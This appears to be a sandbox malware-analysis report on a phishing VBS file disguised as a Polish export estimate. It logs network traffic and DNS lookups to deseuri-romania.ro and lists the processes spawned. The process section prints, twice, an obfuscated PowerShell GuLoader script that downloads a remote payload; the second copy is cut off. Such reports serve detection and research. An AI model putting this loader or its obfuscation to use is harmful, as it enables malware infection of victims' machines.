Oct 24, 2024 15:07:12.186353922 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.186369896 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.186460972 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.186471939 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.186543941 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.197942972 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.197962999 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.198183060 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.198195934 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.198355913 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.331491947 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.331518888 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.331615925 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.331629992 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.331672907 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.332325935 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.332345009 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.332547903 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.332552910 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.332611084 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.333192110 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.333213091 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.333287001 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.333292961 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.333339930 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.336827040 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.336847067 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.336918116 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.336926937 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.336983919 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.337719917 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.337739944 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.337791920 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.337799072 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.337832928 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.337866068 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.338032961 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.338051081 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.338113070 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.338119984 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.338162899 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.478255987 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.478276014 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.478411913 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.478426933 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.478496075 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.478583097 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.478598118 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.478693008 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.478699923 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.478754997 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.479022980 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.479037046 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.479115009 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.479120970 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.479168892 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.479895115 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.479908943 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.479975939 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.479983091 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.480057001 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.480580091 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.480596066 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.480664015 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.480669022 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.480714083 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.481225967 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.481240034 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.481301069 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
                                    Oct 24, 2024 15:07:12.481306076 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481357098 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.481640100 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481654882 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481723070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.481726885 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.481771946 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482141018 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482155085 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482218981 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482223034 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482264996 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482592106 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482606888 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482665062 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482670069 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482707024 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.482975006 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.482989073 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.483038902 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.483043909 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.483082056 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.483092070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484046936 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484061956 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484129906 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484137058 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484175920 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484179020 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484186888 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484205008 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484237909 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484244108 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484271049 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484294891 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484561920 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484575033 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484627962 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484633923 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484672070 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484821081 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484833956 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484891891 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.484898090 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.484934092 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.595875978 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.595932007 CEST44349737188.241.183.203192.168.2.11
                                    Oct 24, 2024 15:07:12.596007109 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.596088886 CEST49737443192.168.2.11188.241.183.203
                                    Oct 24, 2024 15:07:12.598442078 CEST49737443192.168.2.11188.241.183.203
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 15:07:07.985125065 CEST | 57025 | 53 | 192.168.2.11 | 1.1.1.1
Oct 24, 2024 15:07:07.993021965 CEST | 53 | 57025 | 1.1.1.1 | 192.168.2.11
Oct 24, 2024 15:07:10.606014967 CEST | 61115 | 53 | 192.168.2.11 | 1.1.1.1
Oct 24, 2024 15:07:10.677639961 CEST | 53 | 61115 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 15:07:07.985125065 CEST | 192.168.2.11 | 1.1.1.1 | 0xe3b1 | Standard query (0) | Horm5zl_6637.6637.6637.657e | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:07:10.606014967 CEST | 192.168.2.11 | 1.1.1.1 | 0xa6c1 | Standard query (0) | deseuri-romania.ro | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 15:07:03.926285028 CEST | 1.1.1.1 | 192.168.2.11 | 0xee41 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:07:03.926285028 CEST | 1.1.1.1 | 192.168.2.11 | 0xee41 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 15:07:03.926285028 CEST | 1.1.1.1 | 192.168.2.11 | 0xee41 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:07:07.993021965 CEST | 1.1.1.1 | 192.168.2.11 | 0xe3b1 | Name error (3) | Horm5zl_6637.6637.6637.657e | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 15:07:10.677639961 CEST | 1.1.1.1 | 192.168.2.11 | 0xa6c1 | No error (0) | deseuri-romania.ro | | 188.241.183.203 | A (IP address) | IN (0x0001) | false
                                    • deseuri-romania.ro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49737 | 188.241.183.203 | 443 | 7608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 13:07:11 UTC | 176 | OUT | GET /Bennington.jpb HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: deseuri-romania.ro
                                    Connection: Keep-Alive
2024-10-24 13:07:11 UTC | 404 | IN | HTTP/1.1 200 OK
                                    Connection: close
                                    content-type: application/octet-stream
                                    last-modified: Thu, 24 Oct 2024 10:25:02 GMT
                                    accept-ranges: bytes
                                    content-length: 437608
                                    date: Thu, 24 Oct 2024 13:07:11 GMT
                                    server: LiteSpeed
                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



Target ID: 0
Start time: 09:07:06
Start date: 24/10/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
Imagebase: 0x7ff720ae0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 09:07:06
Start date: 24/10/2024
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping Horm5zl_6637.6637.6637.657e
Imagebase: 0x7ff7ba6e0000
File size: 22'528 bytes
MD5 hash: 2F46799D79D22AC72C241EC0322B011D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 3
Start time: 09:07:06
Start date: 24/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68cce0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 09:07:07
Start date: 24/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u 
';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' 
FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. 
nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
Imagebase: 0x7ff6eb350000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 5
Start time: 09:07:07
Start date: 24/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68cce0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 09:07:16
Start date: 24/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u 
';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa 